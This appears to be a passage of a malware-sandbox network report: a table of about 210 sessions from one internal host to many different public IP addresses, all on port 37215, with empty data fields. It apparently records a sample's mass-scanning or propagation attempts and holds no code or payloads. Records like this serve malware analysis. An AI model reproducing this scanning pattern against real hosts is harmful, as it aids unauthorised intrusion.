                                                  18152192.168.2.135054441.199.18.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18153192.168.2.1337296197.143.100.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18154192.168.2.1334452201.178.140.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18155192.168.2.133944041.248.159.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18156192.168.2.1334680169.1.25.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18157192.168.2.1347620157.225.43.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18158192.168.2.1347220197.218.239.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18159192.168.2.134442641.121.91.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18160192.168.2.1357168151.180.11.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18161192.168.2.1359108131.186.221.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18162192.168.2.135157041.234.182.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18163192.168.2.1337072157.223.8.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18164192.168.2.1336088197.70.159.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18165192.168.2.134730274.215.120.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18166192.168.2.1356756185.55.166.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18167192.168.2.1357004191.46.174.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18168192.168.2.1342068157.51.86.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18169192.168.2.1344870180.82.78.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18170192.168.2.135968841.168.149.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18171192.168.2.1350574157.165.79.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18172192.168.2.1340774197.220.45.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18173192.168.2.1353938157.205.188.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18174192.168.2.1338384157.43.179.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18175192.168.2.1348238197.10.55.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18176192.168.2.135407641.96.219.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18177192.168.2.133834441.194.14.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18178192.168.2.134610041.238.120.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18179192.168.2.134174841.152.229.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18180192.168.2.1355592117.194.113.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18181192.168.2.1333086197.44.159.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18182192.168.2.1348798155.144.168.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18183192.168.2.1350718197.216.196.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18184192.168.2.1355008157.198.175.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18185192.168.2.134172441.128.229.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18186192.168.2.1334166157.229.83.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18187192.168.2.1354890197.50.169.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18188192.168.2.1358302129.113.186.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18189192.168.2.1334596211.200.4.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18190192.168.2.1352052157.118.224.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18191192.168.2.135416241.85.22.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18192192.168.2.1337792197.80.135.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18193192.168.2.134387041.78.95.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18194192.168.2.1358130157.123.82.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18195192.168.2.1339632152.122.120.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18196192.168.2.1345992197.122.63.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18197192.168.2.1336416157.88.125.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18198192.168.2.1333666157.4.241.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18199192.168.2.1360948157.101.135.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18200192.168.2.134721241.97.221.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18201192.168.2.135114093.21.64.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18202192.168.2.1349026197.56.43.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18203192.168.2.1354368197.198.141.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18204192.168.2.135566041.121.219.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18205192.168.2.1338476157.86.246.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18206192.168.2.1356786157.255.194.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18207192.168.2.134505612.84.209.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18208192.168.2.1335448197.79.254.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18209192.168.2.1345950197.181.39.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18210192.168.2.1348528149.190.44.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18211192.168.2.1337032100.16.1.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18212192.168.2.133816641.216.197.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18213192.168.2.133771241.61.74.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18214192.168.2.1353290157.218.48.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18215192.168.2.133960841.191.29.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18216192.168.2.1359812157.32.25.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18217192.168.2.133744241.8.255.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18218192.168.2.134770841.236.85.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18219192.168.2.1349092197.51.97.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18220192.168.2.1334096157.172.246.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18221192.168.2.1353664174.188.143.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18222192.168.2.133649841.254.228.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18223192.168.2.1351220180.73.199.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18224192.168.2.135453841.142.108.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18225192.168.2.1348292151.171.97.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18226192.168.2.1359018157.153.199.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18227192.168.2.1342482197.88.160.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18228192.168.2.135366841.112.51.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18229192.168.2.1343806157.240.78.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18230192.168.2.1343334110.72.199.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18231192.168.2.1340208197.152.150.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18232192.168.2.1349840157.194.9.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18233192.168.2.1348738197.153.107.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18234192.168.2.1352414157.216.236.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18235192.168.2.134411641.116.49.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18236192.168.2.1351630197.107.33.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18237192.168.2.134148641.181.86.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18238192.168.2.1351988157.9.237.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18239192.168.2.133944041.160.58.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18240192.168.2.135289041.173.207.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18241192.168.2.133569641.33.115.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18242192.168.2.134587484.244.172.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18243192.168.2.1338322157.239.193.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18244192.168.2.134536641.73.145.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18245192.168.2.1351292197.159.197.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18246192.168.2.133359241.89.173.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18247192.168.2.1341022157.47.58.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18248192.168.2.1344070210.167.91.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18249192.168.2.1356012166.49.99.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18250192.168.2.1340214157.181.109.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18251192.168.2.1348256157.9.253.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18252192.168.2.133510441.116.186.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18253192.168.2.1354464128.233.91.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18254192.168.2.1348864166.97.198.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18255192.168.2.1357476219.20.57.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18256192.168.2.1345600197.9.122.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18257192.168.2.1339070136.99.157.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18258192.168.2.1357460157.158.210.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18259192.168.2.1336906197.75.179.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18260192.168.2.1344350157.243.218.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18261192.168.2.134161618.207.165.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18262192.168.2.1351308197.38.107.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18263192.168.2.1346972104.250.201.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18264192.168.2.1360200199.181.17.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18265192.168.2.1337602197.12.4.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18266192.168.2.1360428157.183.222.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18267192.168.2.133895649.204.14.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18268192.168.2.135632641.82.160.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18269192.168.2.133712641.170.111.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18270192.168.2.1345740197.68.10.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18271192.168.2.134461441.98.142.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18272192.168.2.1334662164.116.190.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18273192.168.2.133312841.50.92.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18274192.168.2.1337652197.15.243.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18275192.168.2.1345526197.116.37.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18276192.168.2.1337534157.73.210.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18277192.168.2.134982478.6.64.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18278192.168.2.1352852190.85.104.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18279192.168.2.135118660.252.108.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18280192.168.2.13530924.223.250.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18281192.168.2.1344902177.193.138.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18282192.168.2.1343254193.155.149.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18283192.168.2.1354504197.247.175.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18284192.168.2.1338858157.124.78.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18285192.168.2.1344466157.18.151.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18286192.168.2.136057241.72.24.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18287192.168.2.1356716197.137.57.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18288192.168.2.1359040157.72.199.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18289192.168.2.135798441.0.27.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18290192.168.2.1347710104.21.167.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18291192.168.2.1349270197.131.146.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18292192.168.2.1353312180.164.110.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18293192.168.2.1355514204.124.31.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18294192.168.2.134926441.218.157.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18295192.168.2.1344938104.240.66.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18296192.168.2.1355762157.27.181.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18297192.168.2.1356984197.82.25.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18298192.168.2.1355518190.244.23.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18299192.168.2.1348324101.25.227.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18300192.168.2.1337834157.203.160.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18301192.168.2.133351241.204.255.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18302192.168.2.134056241.174.204.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18303192.168.2.1344176197.51.3.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18304192.168.2.1336470157.7.236.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18305192.168.2.1339488157.137.122.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18306192.168.2.1349128136.234.212.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18307192.168.2.1333114197.232.192.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18308192.168.2.1347076194.131.173.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18309192.168.2.135501241.213.149.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18310192.168.2.134431441.43.202.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18311192.168.2.1335122125.56.85.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18312192.168.2.1351302157.175.165.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18313192.168.2.1351806157.54.172.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18314192.168.2.1344436102.38.136.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18315192.168.2.134049641.192.223.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18316192.168.2.1357564157.104.19.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18317192.168.2.133297248.135.55.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18318192.168.2.133334041.64.111.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18319192.168.2.135150678.31.79.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18320192.168.2.1340948197.82.146.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18321192.168.2.1340918157.161.132.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18322192.168.2.1342418203.144.203.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18323192.168.2.1358742197.60.215.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18324192.168.2.1339536197.14.253.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18325192.168.2.1348268217.28.206.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18326192.168.2.1342950164.199.119.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18327192.168.2.1335978157.178.244.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18328192.168.2.134129241.3.84.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18329192.168.2.135159641.63.191.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18330192.168.2.133533631.84.200.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18331192.168.2.135982041.45.47.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18332192.168.2.1335210197.190.74.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18333192.168.2.134002041.7.241.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18334192.168.2.1358012117.249.28.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18335192.168.2.1348202157.219.1.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18336192.168.2.1341750157.216.41.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18337192.168.2.133997641.46.55.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18338192.168.2.133491641.143.218.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18339192.168.2.1341446157.59.212.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18340192.168.2.1360064197.146.255.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18341192.168.2.134906041.184.4.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18342192.168.2.1355746157.126.220.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18343192.168.2.134671041.6.178.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18344192.168.2.1341558157.208.122.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18345192.168.2.134549041.39.112.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18346192.168.2.133332841.231.9.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18347192.168.2.1343482197.126.154.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18348192.168.2.133916441.239.127.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18349192.168.2.1336896157.152.238.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18350192.168.2.1339384197.221.180.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18351192.168.2.1340522190.51.10.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18352192.168.2.1358036157.20.236.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18353192.168.2.134812089.33.190.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18354192.168.2.133874244.170.24.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18355192.168.2.135878441.70.64.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18356192.168.2.135046420.186.46.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18357192.168.2.1352506218.110.13.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18358192.168.2.1341952108.234.251.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18359192.168.2.135468641.242.62.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18360192.168.2.1346816157.232.205.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18361192.168.2.135377619.186.131.5637215
